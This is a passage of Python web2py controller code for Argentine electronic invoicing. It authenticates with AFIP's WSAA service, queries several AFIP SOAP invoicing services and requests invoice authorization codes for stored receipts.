'wsbfe': "http://wswhomo.afip.gov.ar/wsbfe/service.asmx?WSDL",
'wsmtxca': "https://fwshomo.afip.gov.ar/wsmtxca/services/MTXCAService?wsdl",
}
WSAA_URL = "https://wsaahomo.afip.gov.ar/ws/services/LoginCms"
def ymd2date(vto):
"Convertir formato AFIP 20101231 a python date(2010,12,31)"
return datetime.date(int(vto[0:4]), int(vto[4:6]), int(vto[6:8]))
def date2y_m_d(fch):
#Convertir de date a AAAA-MM-DD
try:
fchtmp = fch.strftime("%Y%m%d")
return fchtmp[:4] + "-" + fchtmp[4:6] + "-" + fchtmp[6:]
except AttributeError:
return None
def y_m_d2date(fch):
# convertir formato AFIP AAAA-MM-DD a date
try:
return ymd2date(fch.replace("-", ""))
except AttributeError:
return None
def _autenticar(service="wsfe", ttl=60*60*5):
"Obtener el TA"
# wsfev1 => wsfe!
# service = {'wsfev1': 'wsfe'}.get(service, service)
if service not in ("wsfe","wsfev1","wsmtxca","wsfex","wsbfe"):
raise HTTP(500,"Servicio %s incorrecto" % service)
# verifico archivo temporal con el ticket de acceso
TA = os.path.join(PRIVATE_PATH, "TA-%s.xml" % service)
ttl = 60*60*5
if not os.path.exists(TA) or os.path.getmtime(TA)+(ttl)<time.time():
# solicito una nueva autenticación
# wsaa = pyafipws.wsaa
cert = os.path.join(PRIVATE_PATH, CERTIFICATE)
privatekey = os.path.join(PRIVATE_PATH, PRIVATE_KEY)
# creo un ticket de requerimiento de acceso
# cambiando a wsfe si es wsfe(v_)
if "wsfev" in service: service = "wsfe"
tra = wsaa.create_tra(service=service,ttl=ttl)
# firmo el ticket de requerimiento de acceso
cms = wsaa.sign_tra(str(tra),str(cert),str(privatekey))
# llamo al webservice para obtener el ticket de acceso
ta_string = wsaa.call_wsaa(cms,WSAA_URL,trace=False)
# guardo el ticket de acceso obtenido:
open(TA,"w").write(ta_string)
# procesar el ticket de acceso y extraer TOKEN y SIGN:
# from gluon.contrib.pysimplesoap.simplexml import SimpleXMLElement
# agregar librería modificada para aceptar etiquetas vacías
from pysimplesoap.simplexml import SimpleXMLElement
ta_string=open(TA).read()
ta = SimpleXMLElement(ta_string)
token = str(ta.credentials.token)
sign = str(ta.credentials.sign)
return token, sign
# Funciones expuestas al usuario:
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def autenticar():
"Prueba de autenticación"
response.subtitle = "Prueba de autenticación (%s)" % SERVICE
token, sign = _autenticar(SERVICE or 'wsfe')
return dict(token=TOKEN[:10]+"...", sign=SIGN[:10]+"...")
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def dummy():
"Obtener el estado de los servidores de la AFIP"
response.subtitle = "DUMMY: Consulta estado de servidores (%s)" % SERVICE
try:
if SERVICE=='wsfe':
result = client.FEDummy()['FEDummyResult']
elif SERVICE=='wsfev1':
result = client.FEDummy()['FEDummyResult']
elif SERVICE=='wsbfe':
result = client.BFEDummy()['BFEDummyResult']
elif SERVICE=='wsfex':
result = client.FEXDummy()['FEXDummyResult']
elif SERVICE=='wsmtxca':
result = client.dummy()
else:
result = {}
except SoapFault,sf:
db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
result = {'fault': repr(sf.faultstring),
'xml_request': repr(client.xml_request),
'xml_response': repr(client.xml_response),
}
except ExpatError, ee:
result = {"resultado" :"Error en el Cliente SOAP. Formato de respuesta inválido."}
return dict(result = result)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def ultimo_id():
"Obtener el último ID de transacción AFIP"
response.subtitle = "Consulta el último ID de transacción utilizado"
form = SQLFORM.factory(
Field('webservice', type='string', length=6, default='wsfe',
requires = IS_IN_SET(WEBSERVICES)),
)
result = {}
if form.accepts(request.vars, session, keepvalues=True):
if SERVICE=='wsfe':
result = client.FEUltNroRequest(
argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
)['FEUltNroRequestResult']
elif SERVICE=='wsfex':
result = client.FEXGetLast_ID(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
)['FEXGetLast_IDResult']
elif SERVICE=='wsbfe':
result = client.BFEGetLast_ID(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
)['BFEGetLast_IDResult']
elif SERVICE=='wsmtxca':
pass
else:
pass
return {'form': form, 'result': result}
def f_ultimo_id(comprobante):
"Obtener el último ID de transacción AFIP (sin formulario)"
result = {}
valor = None
if SERVICE=='wsfe':
result = client.FEUltNroRequest(
argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
)['FEUltNroRequestResult']
valor = result['nro']['value']
elif SERVICE=='wsfex':
result = client.FEXGetLast_ID(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
)['FEXGetLast_IDResult']
valor = result["FEXResultGet"]["Id"]
elif SERVICE=='wsbfe':
result = client.BFEGetLast_ID(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
)['BFEGetLast_IDResult']
valor = result["BFEResultGet"]["Id"]
elif SERVICE=='wsfev1':
# último id wsfev1
result, valor = None, None
else:
pass
return (result, valor)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def ultimo_numero_comprobante():
"Obtener el último comprobante autorizado por la AFIP"
response.subtitle = "Consulta el último número de comprobante autorizado"
form = SQLFORM.factory(
Field('webservice', type='string', length=6, default='wsfe',
requires = IS_IN_SET(WEBSERVICES)),
Field('tipocbte', type='integer',
requires=IS_IN_DB(db,db.tipocbte.cod,"%(ds)s")),
Field('punto_vta', type='integer', default=1,
requires=IS_NOT_EMPTY()),
)
result = {}
if form.accepts(request.vars, session, keepvalues=True):
try:
if SERVICE=='wsfe':
result = client.FERecuperaLastCMPRequest(
argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
argTCMP={'PtoVta' : form.vars.punto_vta, 'TipoCbte' : form.vars.tipocbte}
)['FERecuperaLastCMPRequestResult']
elif SERVICE=='wsfev1':
result = client.FECompUltimoAutorizado(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
PtoVta=form.vars.punto_vta,
CbteTipo=form.vars.tipocbte,
)['FECompUltimoAutorizadoResult']
elif SERVICE=='wsfex':
result = client.FEXGetLast_CMP(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,
"Tipo_cbte": form.vars.tipocbte,
"Pto_venta": form.vars.punto_vta,}
)['FEXGetLast_CMPResult']
elif SERVICE=='wsbfe':
result = client.BFEGetLast_CMP(
Auth={"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT,
"Tipo_cbte": form.vars.tipocbte,
"Pto_venta": form.vars.punto_vta})
elif SERVICE=='wsmtxca':
# inicializar_y_capturar_execepciones
result = client.consultarUltimoComprobanteAutorizado(\
authRequest = {"token": TOKEN, "sign": SIGN, "cuitRepresentada": CUIT}, consultaUltimoComprobanteAutorizadoRequest = {\
"codigoTipoComprobante" : form.vars.tipocbte, \
"numeroPuntoVenta" : form.vars.punto_vta})
# nro = ret.get('numeroComprobante')
# return nro is not None and str(nro) or 0
else:
pass
except SoapFault,sf:
db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
result = {'fault': repr(sf.faultstring),
'xml_request': repr(client.xml_request),
'xml_response': repr(client.xml_response),
}
except ExpatError, ee:
result = "Error en el Cliente SOAP. Formato de respuesta inválido."
return {'form': form, 'result': result}
# devuelve último cbte
def f_ultimo_numero_comprobante(comprobante):
"Obtener el último comprobante autorizado por la AFIP (sin formulario)"
valor = None
result = {}
try:
if SERVICE=='wsfe':
result = client.FERecuperaLastCMPRequest(
argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
argTCMP={'PtoVta' : comprobante.punto_vta, 'TipoCbte' : comprobante.tipocbte.cod}
)['FERecuperaLastCMPRequestResult']
valor = result["cbte_nro"]
elif SERVICE=='wsfev1':
result = client.FECompUltimoAutorizado(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
PtoVta=comprobante.punto_vta,
CbteTipo=comprobante.tipocbte.cod,
)['FECompUltimoAutorizadoResult']
valor = result["CbteNro"]
elif SERVICE=='wsfex':
result = client.FEXGetLast_CMP(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,
"Tipo_cbte": comprobante.tipocbte.cod,
"Pto_venta": comprobante.punto_vta,}
)['FEXGetLast_CMPResult']
valor = result["FEXResult_LastCMP"]["Cbte_nro"]
elif SERVICE=='wsbfe':
result = client.BFEGetLast_CMP(
Auth={"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT,
"Tipo_cbte": comprobante.tipocbte.cod,
"Pto_venta": comprobante.punto_vta})
valor = result['BFEGetLast_CMPResult']['BFEResult_LastCMP']['Cbte_nro']
elif SERVICE=='wsmtxca':
# inicializar_y_capturar_execepciones
result = client.consultarUltimoComprobanteAutorizado(\
authRequest = {"token": TOKEN, "sign": SIGN, "cuitRepresentada": CUIT}, consultaUltimoComprobanteAutorizadoRequest = {\
"codigoTipoComprobante" : comprobante.tipocbte.cod, \
"numeroPuntoVenta" : comprobante.punto_vta})
try:
if result["arrayErrores"]:
for error in result["arrayErrores"]:
if str(error["codigoDescripcion"]["codigo"]) == "1502":
# no existen cbtes en la base de datos de AFIP
valor = 0
except KeyError:
valor = None
if valor != 0: valor = result["numeroComprobante"]
else:
pass
except SoapFault,sf:
db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
except ExpatError, ee:
result = "Error en el Cliente SOAP. Formato de respuesta inválido."
return (result, valor)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_tributos():
"Recuperador de valores referenciales de tributos"
response = client.FEParamGetTiposTributos(
Auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)})
return dict(resp = response)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def get_param_dstcuit():
"Recuperador de valores referenciales de CUITs de Paises"
response = client.FEXGetPARAM_DST_CUIT(
Auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)})
# if int(response["FEXGetPARAM_DST_CUITResult"]["FEXErr"]["ErrCode"]) != 0:
# raise FEXError(response.FEXGetPARAM_DST_CUITResult.FEXErr)
# pass
return dict(resp = response, dic = repr(response))
def f_get_param_dstcuit(variables):
"Recuperador de valores referenciales de CUITs de Paises"
response = client.FEXGetPARAM_DST_CUIT(
Auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)})
return response
@auth.requires(auth.has_membership('administrador'))
def crear_cuit_paises():
try:
response = f_get_param_dstcuit(variables)
# return dict(resp = response)
# si se recuperaron los parámetros eliminar registros y completar la tabla
if int(response["FEXGetPARAM_DST_CUITResult"]["FEXErr"]["ErrCode"]) == 0:
db(db.dstcuit.id > 0).delete()
db.dstcuit.insert(cod="", ds = "(Sin especificar)", cuit = "50000000000")
for pais in response["FEXGetPARAM_DST_CUITResult"]["FEXResultGet"]:
db.dstcuit.insert(ds = pais["ClsFEXResponse_DST_cuit"]["DST_Ds"], cuit = pais["ClsFEXResponse_DST_cuit"]["DST_CUIT"])
else: raise HTTP(500, response["FEXErr"]["ErrMsg"])
except (TypeError, ValueError, KeyError, AttributeError):
raise HTTP(500, "Se produjo un error al consultar los registros de AFIP. Se deben configurar previamente las variables de autenticación (Credenciales y CUIT)")
redirect(URL(r=request, c='setup', f='index'))
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_tipo_expo():
"Recuperador de valores referenciales de c�digos de Tipo de exportaci�n"
response = client.FEXGetPARAM_Tipo_Expo(
auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT})
if int(response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrCode"]) != 0:
raise HTTP(500, "Error: " + str(response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrCode"]) + ". " + response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrMsg"])
tipos = [] # tipos de exportaci�n
for t in response["FEXGetPARAM_Tipo_ExpoResult"]["FEXResultGet"]["ClsFEXResponse_Tex"]:
tipo = {'id': int(t["Tex_Id"]), 'ds': str(t["Tex_Ds"]).decode('utf8'),
'vig_desde': str(t["Tex_vig_desde"]),
'vig_hasta': str(t["Tex_vig_hasta"])}
tipos.append(tipo)
return dict(tipos = tipos)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_zonas():
# client , TOKEN, SIGN, CUIT
"Recuperador de valores referenciales de Zonas"
response = client.BFEGetPARAM_Zonas(
auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT})
# if int(response.BFEGetPARAM_ZonasResult.BFEErr.ErrCode) != 0:
# raise BFEError(response.BFEGetPARAM_ZonasResult.BFEErr)
zonas = [] # unidades de medida
"""
for z in response.BFEGetPARAM_ZonasResult.BFEResultGet.ClsBFEResponse_Zon:
zon = {'id': int(z.Zon_Id), 'ds': unicode(z.Zon_Ds),
'vig_desde': str(z.Zon_vig_desde),
'vig_hasta': str(z.Zon_vig_hasta)}
zonas.append(zon)
"""
return dict(zonas = str(response))
# WSMTXCA
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def consultar_monedas():
"Este m�todo permite consultar los tipos de comprobantes habilitados en este WS"
ret = client.consultarMonedas(
authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
)
return dict(result = ["%(codigo)s: %(descripcion)s" % p['codigoDescripcion']
for p in ret['arrayMonedas']])
# WSMTXCA
def consultar_unidades_medida():
"Este m�todo permite consultar los tipos de comprobantes habilitados en este WS"
ret = client.consultarUnidadesMedida(
authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
)
return dict(result = ["%(codigo)s: %(descripcion)s" % p['codigoDescripcion']
for p in ret['arrayUnidadesMedida']])
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('auditor') or auth.has_membership('invitado'))
def cotizacion():
"Obtener cotización de referencia según AFIP"
response.subtitle = "Consulta cotización de referencia"
form = SQLFORM.factory(
Field('webservice', type='string', length=6, default='wsfex',
requires = IS_IN_SET(WEBSERVICES)),
Field('moneda_id', type='string', default="DOL",
requires=IS_IN_DB(db,db.moneda.cod,"%(ds)s")),
)
result = {}
if form.accepts(request.vars, session, keepvalues=True):
if SERVICE=='wsfex':
result = client.FEXGetPARAM_Ctz(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
Mon_id= form.vars.moneda_id,
)['FEXGetPARAM_CtzResult']
elif SERVICE=='wsfev1':
result = client.FEParamGetCotizacion(
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
MonId=form.vars.moneda_id,
)['FEParamGetCotizacionResult']
else:
pass
return {'form': form, 'result': result}
@auth.requires(auth.has_membership('emisor') or auth.has_membership('administrador'))
def autorizar():
"Facturador (Solicitud de Autorización de Factura Electrónica AFIP)"
response.subtitle = "Solicitud de Autorización - CAE (%s)" % SERVICE
comprobante = request.args[1]
comprobante = db(db.comprobante.id==comprobante).select().first()
detalles = db(db.detalle.comprobante==comprobante).select()
# cálculo de cbte para autorización
calcular_comprobante(comprobante)
otrostributostmp = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if not (t.tributo.iibb)], 0.00) or 0.00
iibbtmp = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if t.tributo.iibb], 0.00) or 0.00
totaltributostmp = otrostributostmp + iibbtmp
if otrostributostmp == 0: otrostributostmp = None
if totaltributostmp == 0: totaltributostmp = None
# comprobante.imp_op_ex = comprobante_sumar_iva(comprobante)
# comprobante.imp_tot_conc = comprobante_sumar_no_gravado(comprobante)
result = {}
actualizar = {}
# si el cbte no tiene id_ws o nro => consultar último/s
if not comprobante.id_ws:
try:
comprobante.id_ws = int(f_ultimo_id(comprobante)[1]) +1
except (AttributeError, ValueError, KeyError, TypeError):
comprobante.id_ws = None
if not comprobante.cbte_nro:
try:
consulta_cbte = f_ultimo_numero_comprobante(comprobante)
cbte_nro = int(consulta_cbte[1])
comprobante.cbte_nro = cbte_nro +1
except (AttributeError, KeyError, ValueError, TypeError), e:
comprobante.cbte_nro = None
try:
if SERVICE=='wsfe':
result = client.FEAutRequest(
argAuth={'Token': TOKEN, 'Sign': SIGN, 'cuit': CUIT},
Fer={
'Fecr': {'id': long(comprobante.id_ws)+10000, 'cantidadreg': 1,
'presta_serv': comprobante.concepto==1 and '0' or '1'},
'Fedr': {'FEDetalleRequest': {
'tipo_doc': comprobante.tipodoc.cod,
'nro_doc': comprobante.nro_doc.replace("-",""),
'tipo_cbte': comprobante.tipocbte.cod,
'punto_vta': comprobante.punto_vta,
'cbt_desde': comprobante.cbte_nro,
'cbt_hasta': comprobante.cbte_nro,
'imp_total': "%.2f" % comprobante.imp_total,
'imp_tot_conc': comprobante.imp_tot_conc or 0.00,
'imp_neto': "%.2f" % comprobante.imp_neto,
'impto_liq': "%.2f" % comprobante.impto_liq,
'impto_liq_rni': 0.00,
'imp_op_ex': comprobante.imp_op_ex or 0.00,
'fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'fecha_venc_pago': comprobante.fecha_venc_pago and comprobante.fecha_venc_pago.strftime("%Y%m%d"), \
'fecha_serv_desde': comprobante.fecha_serv_desde and comprobante.fecha_serv_desde.strftime("%Y%m%d"), \
'fecha_serv_hasta': comprobante.fecha_serv_hasta and comprobante.fecha_serv_hasta.strftime("%Y%m%d")
}}
}
)['FEAutRequestResult']
if 'resultado' in result.get('FecResp',{}):
# actualizo el registro del comprobante con el resultado:
# intento recuperar fecha de vto.
# para operación aprobada reset de id (local)
if result['FecResp']['resultado'] == "A":
session.comprobante = None
try:
la_fecha_vto = ymd2date(result['FedResp'][0]['FEDetalleResponse']['fecha_vto'])
except ValueError:
la_fecha_vto = None
actualizar = dict(
# Resultado: Aceptado o Rechazado
resultado=result['FecResp']['resultado'],
# Motivo general/del detalle:
motivo=result['FecResp']['motivo'],
reproceso=result['FecResp']['reproceso'],
cae=result['FedResp'][0]['FEDetalleResponse']['cae'],
fecha_vto=la_fecha_vto,
cbte_nro=result['FedResp'][0]['FEDetalleResponse']['cbt_desde'],
id_ws=result['FecResp']['id'],
imp_neto=result['FedResp'][0]['FEDetalleResponse']['imp_neto'],
imp_total=result['FedResp'][0]['FEDetalleResponse']['imp_total'],
impto_liq=result['FedResp'][0]['FEDetalleResponse']['impto_liq'],
impto_liq_rni=result['FedResp'][0]['FEDetalleResponse']['impto_liq_rni'],
imp_op_ex=result['FedResp'][0]['FEDetalleResponse']['imp_op_ex'],
imp_tot_conc=result['FedResp'][0]['FEDetalleResponse']['imp_tot_conc'],
webservice = SERVICE
)
elif result['FecResp']['resultado'] == "R":
session.comprobante = None
actualizar = dict(resultado = "R")
elif SERVICE=='wsfev1':
actualizar = {}
# campos período de servicio: borrar si es tipo 1
if comprobante.concepto == 1:
comprobante.fecha_serv_desde = ""
comprobante.fecha_serv_hasta = ""
comprobante.fecha_venc_pago = ""
if int(comprobante.tipocbte.cod) in [11, 12, 13, 15]:
items_iva = []
else:
items_iva = [{'AlicIva': {
'Id': det["id"],
'BaseImp': "%.2f" % det["base_imp"],
'Importe': "%.2f" % det["importe"],
}}
for det in comprobante_sumar_iva(comprobante)]
result = client.FECAESolicitar(\
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
FeCAEReq={
'FeCabReq': {'CantReg': 1,
'PtoVta': comprobante.punto_vta,
'CbteTipo': comprobante.tipocbte.cod},
'FeDetReq': [{'FECAEDetRequest': {
'Concepto': comprobante.concepto,
'DocTipo': comprobante.tipodoc.cod,
'DocNro': comprobante.nro_doc.replace("-",""),
'CbteDesde': comprobante.cbte_nro,
'CbteHasta': comprobante.cbte_nro,
'CbteFch': comprobante.fecha_cbte.strftime("%Y%m%d"),
'ImpTotal': "%.2f" % comprobante.imp_total,
'ImpTotConc': comprobante.imp_tot_conc or 0.00,
'ImpNeto': "%.2f" % comprobante.imp_neto,
'ImpOpEx': comprobante.imp_op_ex or 0.00,
'ImpTrib': totaltributostmp,
'ImpIVA': "%.2f" % comprobante.impto_liq,
# Fechas solo se informan si Concepto in (2,3)
'FchServDesde': comprobante.fecha_serv_desde and comprobante.fecha_serv_desde.strftime("%Y%m%d"),
'FchServHasta': comprobante.fecha_serv_hasta and comprobante.fecha_serv_hasta.strftime("%Y%m%d"),
'FchVtoPago': comprobante.fecha_venc_pago and comprobante.fecha_venc_pago.strftime("%Y%m%d"),
'MonId': comprobante.moneda_id.cod,
'MonCotiz': comprobante.moneda_ctz,
'CbtesAsoc': [
{'CbteAsoc': {
'Tipo': cbte_asoc.asociado.tipocbte.cod,
'PtoVta': cbte_asoc.asociado.punto_vta,
'Nro': cbte_asoc.asociado.cbte_nro}}
for cbte_asoc in db(db.comprobanteasociado.comprobante == comprobante).select()],
'Tributos': [
{'Tributo': {
'Id': tributo.tributo.cod,
'Desc': unicode(tributo.tributo.ds, "utf-8"),
'BaseImp': moneyornone(tributo.base_imp),
'Alic': tributo.tributo.aliquota,
'Importe': tributo.importe,
}}
for tributo in db(db.detalletributo.comprobante == comprobante).select()],
'Iva': items_iva,
}
}]
})['FECAESolicitarResult']
if 'FeCabResp' in result:
fecabresp = result['FeCabResp']
fedetresp = result['FeDetResp'][0]['FECAEDetResponse']
if fedetresp["Resultado"] == "A":
session.comprobante = None
# aprobado
obstmp = str()
for obs in fedetresp.get('Observaciones', []):
obstmp += "%(Code)s: %(Msg)s. " % obs['Obs']
actualizar = dict(
obs = obstmp,
resultado=fecabresp['Resultado'],
cae=fedetresp['CAE'] and str(fedetresp['CAE']) or "",
fecha_cbte = ymd2date(fedetresp['CbteFch']),
cbte_nro = fedetresp['CbteHasta'],
fecha_vto = ymd2date(fedetresp['CAEFchVto']),
punto_vta = fecabresp['PtoVta'],
webservice = SERVICE
)
else:
# rechazado
actualizar = dict(resultado = "R", cbte_nro = None)
if ('Errors' in result or 'Observaciones' in fedetresp):
""" almacenar el informe de errores u observaciones
y los errores / observaciones """
if 'Errors' in result:
actualizar["err_code"] = ""
actualizar["err_msg"] = ""
for err in result["Errors"]:
actualizar["err_code"] += repr(err["Err"]["Code"]) + ". "
actualizar["err_msg"] += repr(err["Err"]["Msg"]) + ". "
if "Observaciones" in fedetresp:
actualizar["obs"] = ""
for obs in fedetresp["Observaciones"]:
actualizar["obs"] += str(obs["Obs"]["Code"]) + " " + str(obs["Obs"]["Msg"]) + ". "
db.xml.insert(request = client.xml_request, response = client.xml_response)
elif SERVICE=='wsfex':
result = client.FEXAuthorize(Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
Cmp = {\
# str(db.paisdst[comprobante.dst_cmp].cuit).replace("-", "")\
'Id': comprobante.id_ws,
'Fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'Tipo_cbte': comprobante.tipocbte.cod,
'Punto_vta': comprobante.punto_vta,
'Cbte_nro': comprobante.cbte_nro,
'Tipo_expo': comprobante.tipo_expo or 1,
'Permiso_existente': comprobante.permiso_existente,
'Dst_cmp': comprobante.dst_cmp.cod,
'Cliente': unicode(comprobante.nombre_cliente, "utf-8"),
'Cuit_pais_cliente': comprobante.dstcuit.cuit,
'Domicilio_cliente': unicode(comprobante.domicilio_cliente, "utf-8"), # genera excepción Unicode si se usan caracteres no ASCII
'Id_impositivo': comprobante.id_impositivo,
'Moneda_Id': comprobante.moneda_id.cod,
'Moneda_ctz': comprobante.moneda_ctz,
'Obs_comerciales': comprobante.obs_comerciales,
'Imp_total': comprobante.imp_total,
'Obs': comprobante.obs,
'Forma_pago': comprobante.forma_pago,
'Incoterms': comprobante.incoterms,
'Incoterms_ds': comprobante.incoterms_ds,
'Idioma_cbte': comprobante.idioma_cbte,
# listas
'Items': [{ 'Item': {
'Pro_codigo': detalle.codigo, 'Pro_ds': unicode(detalle.ds, "utf-8"), 'Pro_qty': detalle.qty, 'Pro_umed': detalle.umed.cod, 'Pro_precio_uni': detalle.precio,
'Pro_total_item': (detalle.imp_total)
}} for detalle in db(db.detalle.comprobante == comprobante).select()],
'Permisos': [{ 'Permiso': { 'Id_permiso': permiso.id_permiso, 'Dst_merc': permiso.dst_merc.cod
}} for permiso in db(db.permiso.comprobante == comprobante).select()],
'Cmps_asoc': [{ 'Cmp_asoc': {
'Cbte_tipo': comprobanteasociado.asociado.tipocbte.cod, 'Cbte_punto': comprobanteasociado.asociado.punto_vta, 'Cbte_numero': comprobanteasociado.asociado.cbte_nro
}} for comprobanteasociado in db(db.comprobanteasociado.comprobante == comprobante).select()],
})['FEXAuthorizeResult']
if 'FEXResultAuth' in result:
if "Resultado" in result["FEXResultAuth"]:
if result["FEXResultAuth"]["Resultado"] == "A":
session.comprobante = None
# aprobado
actualizar = dict(
obs = result["FEXResultAuth"]["Motivos_Obs"],
resultado=result["FEXResultAuth"]['Resultado'],
cae=result["FEXResultAuth"]["Cae"],
fecha_cbte = ymd2date(result["FEXResultAuth"]["Fch_cbte"]),
cbte_nro = result["FEXResultAuth"]["Cbte_nro"],
fecha_vto = ymd2date(result["FEXResultAuth"]["Fch_venc_Cae"]),
punto_vta = result["FEXResultAuth"]["Punto_vta"],
reproceso = result["FEXResultAuth"]["Reproceso"],
id_ws = result["FEXResultAuth"]["Id"],
webservice = SERVICE
)
else:
# rechazado
actualizar = dict(
obs = result["FEXResultAuth"]["Motivos_Obs"],
resultado=result["FEXResultAuth"]['Resultado'],
id_ws = result["FEXResultAuth"]["Id"],
err_code = result["FEXErr"]["ErrCode"],
err_msg = result["FEXErr"]["ErrMsg"],
webservice = SERVICE
)
session.comprobante = None
if result["FEXErr"]["ErrCode"] or result["FEXResultAuth"]["Motivos_Obs"]:
# almacenar el informe de errores u observaciones
db.xml.insert(request = client.xml_request, response = client.xml_response)
else:
try:
actualizar = dict(err_code = result["FEXErr"]["ErrCode"], err_msg = result["FEXErr"]["ErrMsg"])
except (AttributeError, ValueError, TypeError, KeyError):
actualizar = dict(obs = "Error al procesar la respuesta del web service.")
db.xml.insert(request = client.xml_request, response = client.xml_response)
elif SERVICE=='wsbfe':
result = client.BFEAuthorize(\
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': long(CUIT)},
Cmp={'Id': comprobante.id_ws,
'Tipo_doc': comprobante.tipodoc.cod,
'Nro_doc': str(comprobante.nro_doc).replace("-", ""),
'Zona': 1,
'Tipo_cbte': comprobante.tipocbte.cod,
'Fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'Punto_vta': comprobante.punto_vta,
'Cbte_nro': comprobante.cbte_nro,
'Imp_total': "%.2f" % comprobante.imp_total,
'Imp_tot_conc': comprobante.imp_tot_conc or 0.00,
'Imp_neto': "%.2f" % comprobante.imp_neto,
'Impto_liq': "%.2f" % comprobante.impto_liq,
'Impto_liq_rni': comprobante.impto_liq_rni or 0.00,
'Imp_op_ex': comprobante.imp_op_ex or 0.00,
'Imp_perc': comprobante.impto_perc or 0.00,
'Imp_iibb': iibbtmp or None,
'Imp_perc_mun': sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if t.tributo.iibb == False], 0.00) or 0.00,
'Imp_internos': comprobante.imp_internos or 0.00,
'Imp_moneda_Id': comprobante.moneda_id.cod,
'Imp_moneda_ctz': comprobante.moneda_ctz,
'Items': [{'Item': item} for item in detalles_bono_fiscal(comprobante)],
}
)
if int(result["BFEAuthorizeResult"]["BFEErr"]["ErrCode"]) != 0:
# hubo error?
errortmp = result["BFEAuthorizeResult"]["BFEErr"]
actualizar = dict(err_code = unicode(errortmp["ErrCode"]),
err_msg = unicode(errortmp["ErrMsg"]), resultado = "R")
session.comprobante = None
else:
# extraigo la respuesta (auth y eventos)
restmp = result["BFEAuthorizeResult"]["BFEResultAuth"]
actualizar = dict(
id_ws=int(restmp["Id"]),
cae=str(restmp["Cae"]),
fecha_cbte=ymd2date(restmp["Fch_cbte"]),
resultado=str(restmp["Resultado"]),
fecha_vto=ymd2date(restmp["Fch_venc_Cae"]),
reproceso=str(restmp["Reproceso"]),
obs=str(restmp["Obs"])
)
session.comprobante = None
elif SERVICE=='wsmtxca':
# campos período de servicio: borrar si es tipo 1
if comprobante.concepto == 1:
comprobante.fecha_serv_desde = None
comprobante.fecha_serv_hasta = None
comprobante.fecha_venc_pago = None
fact = {
'codigoTipoDocumento': comprobante.tipodoc.cod,
'numeroDocumento':comprobante.nro_doc.replace("-", ""),
'codigoTipoComprobante': comprobante.tipocbte.cod,
'numeroPuntoVenta': comprobante.punto_vta,
'numeroComprobante': comprobante.cbte_nro,
'importeTotal': moneyornone(comprobante.imp_total),
'importeNoGravado': moneyornone(comprobante.imp_tot_conc),
'importeGravado': moneyornone(comprobante.imp_neto),
'importeSubtotal': moneyornone(float(comprobante.imp_neto) + float(comprobante.imp_op_ex) + float(comprobante.imp_tot_conc)), # 'imp_iva': imp_iva,
'importeOtrosTributos': moneyornone(comprobante.imp_trib),
'importeExento': moneyornone(comprobante.imp_op_ex),
'fechaEmision': date2y_m_d(comprobante.fecha_cbte) or None,
'codigoMoneda': comprobante.moneda_id.cod,
'cotizacionMoneda': comprobante.moneda_ctz,
'codigoConcepto': comprobante.concepto,
'observaciones': comprobante.obs_comerciales,
'fechaVencimientoPago': date2y_m_d(comprobante.fecha_venc_pago) or None,
'fechaServicioDesde': date2y_m_d(comprobante.fecha_serv_desde) or None,
'fechaServicioHasta': date2y_m_d(comprobante.fecha_serv_hasta) or None,
